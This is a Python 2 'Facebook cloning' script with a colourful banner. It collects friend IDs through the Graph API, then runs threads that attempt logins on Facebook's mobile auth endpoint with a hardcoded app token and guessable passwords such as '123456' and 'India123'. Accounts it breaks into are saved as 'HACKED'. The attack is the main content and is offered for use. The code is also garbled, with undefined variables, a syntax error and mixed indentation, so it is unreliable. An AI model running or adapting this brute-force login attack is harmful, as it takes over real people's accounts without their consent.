# Ustad# SIDRA5# Thuglife# Somibro# Gamz#!/usr/bin/python2
#coding=utf-8
import os,sys,time,datetime,random,hashlib,re,threading,json,urllib,cookielib,getpass
os.system('rm -rf .txt')
for n in range(70000):

    nmbr = random.randint(1111111, 9999999)
    
    sys.stdout = open('.txt', 'a')

    print (nmbr)

    sys.stdout.flush()
    
try:
    import requests
except ImportError:
    os.system('pip2 install mechanize')
    
try:
    import mechanize
except ImportError:
    os.system('pip2 install request')
    time.sleep(1)
    os.system('python2 .README.md')
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
from mechanize import Browser
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(),max_time=1)
br.addheaders = [('Opera/12.02 (Android 4.1; Linux; Opera Mobi/ADR-1111101157; U; en-US) Presto/2.9.201 Version/12.02')]
br.addheaders = [('user-agent','Dalvik/1.6.0 (Linux; U; Android 4.4.2; NX55 Build/KOT5506) [FBAN/FB4A;FBAV/106.0.0.26.68;FBBV/45904160;FBDM/{density=3.0,width=1080,height=1920};FBLC/it_IT;FBRV/45904160;FBCR/PosteMobile;FBMF/asus;FBBD/asus;FBPN/com.facebook.katana;FBDV/ASUS_Z00AD;FBSV/5.0;FBOP/1;FBCA/x86:armeabi-v7a;]')]


def exb():
    print '[!] Exit Successfully thanku somi'
    os.sys.exit()


def acak(b):
    w = 'ahtdzjc'
    d = ''
    for i in x:
        d += '!'+w[random.randint(0,len(w)-1)]+i
    return cetak(d)


def cetak(b):
    w = 'ahtdzjc'
    for i in w:
        j = w.index(i)
        x= x.replace('!%s'%i,'\033[%s;1m'%str(31+j))
    x += '\033[0m'
    x = x.replace('!0','\033[0m')
    sys.stdout.write(x+'\n')

def lodhirt():
    lodhirt = [
     'AM', '   ', 'AM', '  ', 'BRAND BOY\n']
    for o in lodhirt:
        print '\r\x1b[1;94m\x1b[1;97m' + o,
        sys.stdout.flush()
        time.sleep(0.5)
def jalan(x):
	for e in x + '\n':
		sys.stdout.write(e)
		sys.stdout.flush()
		time.sleep(3.0 / 200)
def tik():
    titik = [
     '   ', 'SOMI  ', 'SOMI BRAND ', 'SOMI BRAND BOY', '100% WORKING,', '  ', '   ']
    for o in titik:
        print '\r\x1b[1;97m \x1b[1;91mPlease\x1b[1;92m Wait\x1b[1;97m' + o,
        sys.stdout.flush()
        time.sleep(0.5)
        


os.system("clear")
logo = """


"""
logo1 = """
\033[1;94m ######   #######  ##     ## #### 
\033[1;92m##    ## ##     ## ###   ###  ##  
\033[1;96m##       ##     ## #### ####  ##  
 \033[1;92m######  ##     ## ## ### ##  ##  
\033[1;91m      ## ##     ## ##     ##  ##  
\033[1;94m##    ## ##     ## ##     ##  ##  
\033[1;93m ######   #######  ##     ## #### 

\033[1;97m===============================================
\033[1;92m☣CREATER   :  Somi awan჻
\033[1;96m☣WHATAAP : 03455453538჻
\033[1;91m☣FACEBOOK Somi Awan჻
\033[1;97m===============================================
\033[1;93m☀NOTE Termux Data Clear EveryDay ჻
\033[1;97m===============================================
                                                             

"""
logo2 = """
\033[1;91m  _______   _______   ___ ___   ___ 
\033[1;92m |   _   | |   _   | |   Y   | |   |
\033[1;93m |   1___| |.  |   | |.      | |.  |
\033[1;94m |____   | |.  |   | |. \_/  | |.  |
 \033[1;95m|:  1   | |:  1   | |:  |   | |:  |
\033[1;96m |::.. . | |::.. . | |::.|:. | |::.|
\033[1;92m `-------' `-------' `--- ---' `---'
"""
logo3 = """                                    
\033[1;93m
TYPE ANY COUNTARY PHONE NUMBER CODE
\033[1;96m
[1] INDIA 905,975,755,855,954, 897, 967, 937, 700, 727, 965, 786, 874, 856, 566, 590, 527, 568, 578
[2] USA 555,786, 815, 315, 256, 401, 718, 917, 202, 701, 303, 703, 803, 999, 708, 559, 310, 809, 551
[3] UK 715,785,765,725,745,735,737, 706, 748, 783, 739, 759, 790
[4] BANGLA 175,165,191, 192, 193, 194, 195, 196, 197, 198, 199
[5] BRAZIL  127, 179, 117, 853, 318, 219, 834, 186, 479, 113
[6] JAPAN 11, 12, 19, 16, 15, 13, 14, 18, 17
[7] KOREA 1, 2, 3, 4, 5, 6, 7, 8, 9
[8] iTLY 311,323,385,388, 390, 391, 371, 380, 368, 386, 384, 332, 344, 351, 328
[9] SPAIN 655,755,60, 76, 73, 64, 69, 77, 65, 61, 75, 68
[10] POLAND 66, 69, 78, 79, 60, 72, 67, 53, 51
[11] iNDONESIA 81,83,85,84,89
[12] PERU 91,92,93,94,95,96,97,98,99
[13[ AUSTRAliA 455
[14] CANADA 555
[15] CHINA 1355,1555,1855
[16] DENMARK 2,3,4,5,6,7,8
[17] PAKISTAN  00 TO 49
\033[1;97m
NOTE 
leave the first two digits and the last seven digits of any phone number in some  countrys.Write the remaining digits here


"""
logo4 ="""
"""
back = 0
berhasil = []
cekpoint = []
oks = []
id = []
cpb = []
def menu():
    os.system('clear')
    print logo1
    print 47* '\033[1;93m◔'
    print
    lodhirt()
    print
    jalan('\x1b[1;92m⁅\x1b[1;92m1\x1b[1;93m⁆ \x1b[0;91m≽≽≽ START \x1b[0;93mCLONING ჻')
    print
    jalan('\033[1;92m⁅\x1b[1;93m0\x1b[1;93m⁆ \x1b[0;92m≽≽≽ ⌧ EXIT჻')
    print
    print
    print 47* '\033[1;97m◔'
    action()


def action():
    global cpb
    global oks
    somi = raw_input('\n\n \x1b[1;94m✎ ≿≿≿≿   ')
    if somi == '':
        print '[!] Fill in correctly'
        action()
    elif somi == '1':
        tik()
        os.system('clear')
        print logo
        print
        try:
        	idt = raw_input("\033[1;96m \033[1;90m[☎]\033[1;92mENTER ACCOUNT  \033[1;91m: \033[1;97m")
		try:
			jok = t+"?access_token=")
			op = json.loads(a.text)
			print"\033[1;90m [✓]\033[1;96mNAME\033[1;91m :\033[1;97m "
		except KeyError:
			print"\033[1;96m \x1b[1;91mID Not Found!"
			raw_input("\n\033[1;96m[\033[1;97mBack\033[1;96m]")
			super()
		jalan('\033[1;96m \033[1;90m[✓]\033[1;91mGETTING IDS \033[1;97m...')
		r = requests.get("https://graph.facebook.com/"+idt+"/friends?access_token="+toket)
		z = json.loads(r.text)
		for i in z['data']:
			id.append(i['id'])
    else:
		print "\033[1;96m \x1b[1;91mFill in correctly"
		pilih_super()
	
	print "\033[1;96m \033[1;90m[✓]\033[1;95mTOTAL ACCOUNT\033[1;91m: \033[1;97m"+str(len(id))
	jalan('\033[1;96m \033[1;90m[✓]\033[1;93mSTAR BOY\033[1;97m...')
    print("\r\033[1;90m [✓]\033[1;97mPLEASE WAIT, PROCESS IS START\033[1;97m"+o),;sys.stdout.flush();time.sleep(1)
	print
	print('\x1b[1;96m \x1b[1;90m[!]\033[1;94mTO STOP THIS PROCESS PRESS Ctrl THEN z ')
	print 47*"\033[1;96m═"
	
    def main(arg):
        user = arg
        try:
            os.mkdir('save')
        except OSError:
            pass
        try:
            pass1 = ('786786')
            data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' +k+c+user+ '&locale=en_US&password=' + pass1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
            q = json.load(data)
            if 'access_token' in q:
                print '\x1b[1;93m(Open \x1b[1;96mNow  )  ' + k + c + user + ' → ' + pass1                                       
                okb = open('save/successfull.txt', 'a')
                okb.write(k+c+user+pass1+'\n')
                okb.close()
                oks.append(c+user+pass1)
            else:
                if 'www.facebook.com' in q['error_msg']:
                    print '\033[1;92m(Aftar \x1b[1;94m7days) ' + k + c + user + ' → ' + pass1
                    cps = open('save/checkpoint.txt', 'a')
                    cps.write(k+c+user+pass1+'\n')
                    cps.close()
                    cpb.append(c+user+pass1)
                else:
                    pass2 = k + c + user
                    data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' +k+c+user+ '&locale=en_US&password=' + pass2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
                    q = json.load(data)
                    if 'access_token' in q:
                        print '\x1b[1;93m(Open \x1b[1;96mNow)  ' + k + c + user +  ' → ' + pass2
                        okb = open('save/successfull.txt', 'a')
                        okb.write(k+c+user+pass2+'\n')
                        okb.close()
                        oks.append(c+user+pass2)
                    else:
                        if 'www.facebook.com' in q['error_msg']:
                            print '\033[1;92m(Aftar \x1b[1;94m7days) ' + k + c + user + ' → ' + pass2
                            cps = open('save/checkpoint.txt', 'a')
                            cps.write(k+c+user+pass2+'\n')
                            cps.close()
                            cpb.append(c+user+pass2)
                        else:
                            pass3="India123"
                            data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' +k+c+user+ '&locale=en_US&password=' + pass3 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
                            q = json.load(data)
                            if 'access_token' in q:
                                print '\x1b[1;93m(Open \x1b[1;96mNow)  ' + k + c + user + ' → '+ pass3
                                okb = open('save/successfull.txt', 'a')
                                okb.write(k+c+user+pass3+'\n')
                                okb.close()
                                oks.append(c+user+pass3)
                            else:
                                if 'www.facebook.com' in q['error_msg']:
                                    print '\033[1;92m(Aftar \x1b[1;94m7days) ' + k + c + user + ' → ' + pass3 
                                    cps = open('save/checkpoint.txt', 'a')
                                    cps.write(k+c+user+pass3+'\n')
                                    cps.close()
                                    cpb.append(c+user+pass3)
                                else:
                                    pass4="786786"
                                    data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' +k+c+user+ '&locale=en_US&password=' + pass4 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
                                    q = json.load(data)
                                    if 'access_token' in q:
                                        print '\x1b[1;93m(Open \x1b[1;96mNow)  ' + k + c + user + ' → ' + pass4 
                                        okb = open('save/successfull.txt', 'a')
                                        okb.write(k+c+user+pass4+'\n')
                                        okb.close()
                                        oks.append(c+user+pass4)
                                    else:
                                        if 'www.facebook.com' in q['error_msg']:
                                            print '\033[1;92m(Aftar \x1b[1;94m7days) ' + k + c + user + ' → ' + pass4
                                            cps = open('save/checkpoint.txt', 'a')
                                            cps.write(k+c+user+pass4+'\n')
                                            cps.close()
                                            cpb.append(c+user+pass4)
                                        else:
                                            pass5="123456"
                                            data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' +k+c+user+ '&locale=en_US&password=' + pass5 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
                                            q = json.load(data)
                                            if 'access_token' in q:
                                                print '\x1b[1;93m(Open \x1b[1;96mNow)  ' + k + c + user + ' → ' + pass5
                                                okb = open('save/successfull.txt', 'a')
                                                okb.write(k+c+user+pass5+'\n')
                                                okb.close()
                                                oks.append(c+user+pass5)
                                            else:
                                                if 'www.facebook.com' in q['error_msg']:
                                                    print '\033[1;92m(Aftar \x1b[1;94m7days) ' + k + c + user + ' → ' + pass5 
                                                    cps = open('save/checkpoint.txt', 'a')
                                                    cps.write(k+c+user+pass5+'\n')
                                                    cps.close()
                                                    cpb.append(c+user+pass5)
                                                                                                          
                                                                                                                                                                                                                    
                                                                                                                                                                                                            


                                                
     
                                                                                                                                                                                                                                                                                                             
        except:
            pass
        
    p = ThreadPool(30)
    p.map(main, id)
    print '[\xe2\x9c\x93] \x1b[1;96mPROCESS HAS BEEN COMPLETED....'
    print '[\xe2\x9c\x93] \x1b[1;96mTOTAL HACKED/CHECKPOINT : ' + str(len(oks)) + '/' + str(len(cpb))
    print '[\xe2\x9c\x93] \x1b[1;96mCP FILE HAS BEEN SAVED : save/login.txt'
    raw_input('\n[\x1b[1;96mPRESS ENTER TO GO BACK]')
    print 'SOMI BRAND CODING STAR'
    print ''
    print """
    """
    
    raw_input("\n\033[1;92m[\033[1;92mEXIST\033[1;92m]")
    menu() 
          
if __name__ == '__main__':
    menu()

